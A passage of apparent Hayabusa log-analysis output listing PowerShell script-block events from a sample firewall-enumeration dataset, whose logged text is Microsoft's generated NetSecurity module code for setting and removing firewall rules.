$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType 
= 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"mdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else 
{ $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] 
[bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() 
if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', 
